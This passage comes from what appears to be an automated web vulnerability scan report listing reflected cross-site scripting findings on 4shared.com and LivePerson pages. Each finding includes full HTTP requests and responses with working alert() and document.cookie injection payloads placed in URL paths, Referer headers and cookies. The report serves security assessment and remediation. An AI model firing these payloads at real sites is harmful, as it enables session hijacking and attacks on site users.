This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=72961245875bb%0a4f95fc6c67c&d_id=sales HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.microsoftstore.com/store/msstore/en_US/buy/pageType.product/externalRefID.8D6DDFB5?WT.mc_id=ecomaircover_autocollage
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 66
Cache-Control: public, max-age=3600
Date: Tue, 19 Apr 2011 11:24:45 GMT
Connection: close

//Plugins for site 72961245875bb
4f95fc6c67c

lpAddMonitorTag();

3.355. http://static.4shared.com/bundles/css/630963420/css/openid.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/630963420/css/openid.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eba06"-alert(1)-"0dae7da8be1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundleseba06"-alert(1)-"0dae7da8be1/css/630963420/css/openid.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundleseba06&quot;-alert(1)-&quot;0dae7da8be1/css/630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2D6048BB9FB76323C5C3BE99CEBF5256.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:33 GMT
Content-Length: 36275


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundleseba06"-alert(1)-"0dae7da8be1/css/630963420/css/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
functio
...[SNIP]...

3.356. http://static.4shared.com/bundles/css/630963420/css/openid.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/630963420/css/openid.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2dac"-alert(1)-"8e22e060db7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/cssc2dac"-alert(1)-"8e22e060db7/630963420/css/openid.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/cssc2dac&quot;-alert(1)-&quot;8e22e060db7/630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FBF240C76EC127DA98FA6F09514E90FB.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:39 GMT
Content-Length: 36264


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/cssc2dac"-alert(1)-"8e22e060db7/630963420/css/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function fe
...[SNIP]...

3.357. http://static.4shared.com/bundles/css/677814427/css/upload-frame.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a0ff"-alert(1)-"7efa6baafe1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles7a0ff"-alert(1)-"7efa6baafe1/css/677814427/css/upload-frame.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles7a0ff&quot;-alert(1)-&quot;7efa6baafe1/css/677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C9A0A5D1372DE2F395F2A8F70FB5F31E.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:57 GMT
Content-Length: 36305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles7a0ff"-alert(1)-"7efa6baafe1/css/677814427/css/upload-frame.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
f
...[SNIP]...

3.358. http://static.4shared.com/bundles/css/677814427/css/upload-frame.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 783a9"-alert(1)-"fe838ec3fce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/css783a9"-alert(1)-"fe838ec3fce/677814427/css/upload-frame.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/css783a9&quot;-alert(1)-&quot;fe838ec3fce/677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=304A6285BAAEAEA780FB81E9E5975246.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:03 GMT
Content-Length: 36305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css783a9"-alert(1)-"fe838ec3fce/677814427/css/upload-frame.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
funct
...[SNIP]...

3.359. http://static.4shared.com/bundles/css/765844602/css/flags.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/765844602/css/flags.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4888"-alert(1)-"558cf729ae5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundlese4888"-alert(1)-"558cf729ae5/css/765844602/css/flags.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundlese4888&quot;-alert(1)-&quot;558cf729ae5/css/765844602/css/flags.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=12177EB456CEE1C9AFF4E125678D208A.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:56:58 GMT
Content-Length: 36373


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundlese4888"-alert(1)-"558cf729ae5/css/765844602/css/flags.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

3.360. http://static.4shared.com/bundles/css/765844602/css/flags.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/765844602/css/flags.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55cbe"-alert(1)-"bce3fca82c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/css55cbe"-alert(1)-"bce3fca82c4/765844602/css/flags.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundles/css55cbe&quot;-alert(1)-&quot;bce3fca82c4/765844602/css/flags.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4A31C5648BE49CC8FA265F59DDBF3C6C.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:57:07 GMT
Content-Length: 36373


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css55cbe"-alert(1)-"bce3fca82c4/765844602/css/flags.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function fee
...[SNIP]...

3.361. http://static.4shared.com/bundles/css/N162308233/css/network.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/N162308233/css/network.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 499e1"-alert(1)-"af069d79772 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles499e1"-alert(1)-"af069d79772/css/N162308233/css/network.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundles499e1&quot;-alert(1)-&quot;af069d79772/css/N162308233/css/network.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8FE0ABC5F9D90922FE6288DE17D525C3.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:56:58 GMT
Content-Length: 36388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles499e1"-alert(1)-"af069d79772/css/N162308233/css/network.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
funct
...[SNIP]...

3.362. http://static.4shared.com/bundles/css/N162308233/css/network.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/N162308233/css/network.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 216fd"-alert(1)-"7a2ba26463d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/css216fd"-alert(1)-"7a2ba26463d/N162308233/css/network.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundles/css216fd&quot;-alert(1)-&quot;7a2ba26463d/N162308233/css/network.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2B8D94FCBEA8898B3426C9E00B7FE2E5.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:57:07 GMT
Content-Length: 36388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css216fd"-alert(1)-"7a2ba26463d/N162308233/css/network.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

3.363. http://static.4shared.com/bundles/css/N90201876/css/ajax-suggestions.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1530f"-alert(1)-"5c8612fc249 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles1530f"-alert(1)-"5c8612fc249/css/N90201876/css/ajax-suggestions.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles1530f&quot;-alert(1)-&quot;5c8612fc249/css/N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B17461934EAD1091733A85356597E328.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:40 GMT
Content-Length: 36325


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles1530f"-alert(1)-"5c8612fc249/css/N90201876/css/ajax-suggestions.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

3.364. http://static.4shared.com/bundles/css/N90201876/css/ajax-suggestions.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2117a"-alert(1)-"c970855b872 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/css2117a"-alert(1)-"c970855b872/N90201876/css/ajax-suggestions.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/css2117a&quot;-alert(1)-&quot;c970855b872/N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C16C4564F26D125869512CC66192510F.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:47 GMT
Content-Length: 36325


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css2117a"-alert(1)-"c970855b872/N90201876/css/ajax-suggestions.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
f
...[SNIP]...

3.365. http://static.4shared.com/bundles/css/gzip_630963420/css/openid.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/gzip_630963420/css/openid.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 163b1"-alert(1)-"297eae2c019 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles163b1"-alert(1)-"297eae2c019/css/gzip_630963420/css/openid.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles163b1&quot;-alert(1)-&quot;297eae2c019/css/gzip_630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CFEBAD46D8406FDC60AABD88429B07B6.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:48 GMT
Content-Length: 36319


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles163b1"-alert(1)-"297eae2c019/css/gzip_630963420/css/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
fu
...[SNIP]...

3.366. http://static.4shared.com/bundles/css/gzip_630963420/css/openid.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/gzip_630963420/css/openid.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30f3d"-alert(1)-"0dd0c41e0d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/css30f3d"-alert(1)-"0dd0c41e0d3/gzip_630963420/css/openid.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
